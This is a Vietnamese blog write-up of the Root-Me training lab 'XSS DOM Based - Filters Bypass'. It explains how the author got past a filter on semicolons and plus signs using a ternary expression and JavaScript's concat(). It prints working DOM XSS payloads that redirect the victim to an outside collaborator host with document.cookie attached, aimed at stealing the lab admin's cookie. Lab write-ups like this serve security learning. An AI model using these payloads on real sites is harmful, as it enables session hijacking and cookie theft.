- vừa được xem lúc

XSS DOM Based - Filters Bypass Rootme [Write up]

#XSS
#rootme
#filters bypass
#dom xss

0 0 6

Người đăng: DUKI

Theo Viblo Asia

Xin chào mọi người. Trong bài viết hôm nay mình sẽ nói cách khai thác lab XSS DOM Based - Filters Bypass trên root me. Nhìn vào đề bài thì có thể biết ngay nó có lỗ hổng liên quan đến Dom xss rồi. Bài này nó yêu cầu lấy được cookie của admin. Truy cập vào lab và mở mã nguồn của nó ra

image.png

  • Nhìn lên ảnh trên có thể thấy được logic code trong thẻ script kia. Nếu chúng ta nhập đúng cái số random cũng không có flag đâu nên khỏi cần quan tâm.
  • Vậy có thể nhìn thấy ngay là đầu vào của chúng ta được reflec lại trong đoạn script như trên ảnh kia.
  • Oki như thường lệ thì thử alert(1) xem sao nhưng để alert được chúng ta cần đóng dấu quot lại và thêm lệnh mới sau: ';alert(1);
    image.png
  • Oh no nó filter cái dấu chấm phẩy rồi. Thử các dấu khác thì thấy nó fiter dấu: +%"; mấy dấu mà mình hay dùng để khai thác
  • Đến đây thử tìm các payload khác xem sao nhưng kiểu gì cũng cần dùng đến dấu chấm phẩy để kết thúc câu lệnh trước.
  • Rồi ngồi ngâm ngâm lúc thì mới nhớ tới câu điều kiện: var number= '1'?alert(1):'1' thì bùm nó đã được
    image.png
  • Đến đây nghĩ ngon ăn rồi thì sử dụng window.location.href và gọi tới burp colaborator của mình thôi.
  • Sử dụng payload: 1'?(window.location.href=('https://alzvookurrw402d2ukimhrh2ttzsnmbb.oastify.com?cookie='+document.cookie):'1 thì bùm nó báo mình đang muốn chuyển hướng à. Vào burp colabo cũng không thấy request nào bắn tới cả
    image.png
  • Vậy thử bỏ https: đi xem sao thì chẳng thấy hiện tượng gì xảy ra cả
    image.png
  • Lúc này lú luôn vì thử alert(document.cookie) vẫn hoạt động bình thường có bị chặn gì đâu. Thì ngồi check kỹ lại payload thấy cái dấu cộng kia. Trước đó là check thử những ký tự nào bị filter rồi mà quên mất. Giờ thì đi tìm cái khác thay cho dấu + thôi.
  • Mình có tìm được hàm concat của js và thử payload mới: 1'?(window.location.href=('//[burp colaborator hoặc dùng webhook nhé]?cookie=').concat('', document.cookie)):'1 và nó đã hoạt động. Khi các bạn thực hiện thì thay
  • Các b nhớ test tài khoản của chính mình trước nhé nếu được rồi thì gửi đường dẫn tới cho admin thôi. Nhớ là đường dẫn phải bắt đầu bằng http nhé https là không được đâu 😃)). Flag các b tự tìm nha

Bình luận

Bài viết tương tự

- vừa được xem lúc

PDF Export, cẩn thận với những input có thể truyền vào

Giới thiệu. Dạo gần đây mình tình cờ gặp rất nhiều lỗi XSS, tuy nhiên trang đó lại có sử dụng dữ liệu người dùng input vào để export ra PDF.

0 0 49

- vừa được xem lúc

Cải thiện bảo mật trong ReactJS

1. Bảo mật XSS với data-binding.

0 0 29

- vừa được xem lúc

[Write-up] Intigriti's December XSS Challenge 2020

Giới thiệu. Gần đây mình có làm thử một bài CTF về XSS của Intigriti (platform bug bounty của châu Âu) và nhờ có sự trợ giúp của những người bạn cực kỳ bá đạo, cuối cùng mình cũng hoàn thành được challenge.

0 0 35

- vừa được xem lúc

Những lỗ hổng hàng đầu trong ứng dụng web có thể ngăn chặn bằng thử nghiệm

Khi nói về rủi ro không gian mạng, điều đầu tiên chúng ta có thể nghĩ đến là phần mềm độc hại. Tuy nhiên, nhiều cuộc tấn công mạng có liên quan đến ứng dụng.

0 0 65

- vừa được xem lúc

EC-Cube CMS và một số vấn đề bảo mật

Giới thiệu về EC-Cube. Ra đời từ năm 2006, EC-CUBE hiện là platform thương mại điển tử mã nguồn mở số 1 tại thị trường Nhật Bản.

0 0 73

- vừa được xem lúc

Setup XSS Hunter Express để khai thác XSS

Chẳng là ai là bug bounty hunter, pentester, researcher security cũng đã từng biết đến công cụ khai thác lỗ hổng XSS XSSHunter. Công cụ này giúp cho các bạn có thể test, khai thác các lỗ hổng XSS (như

0 0 19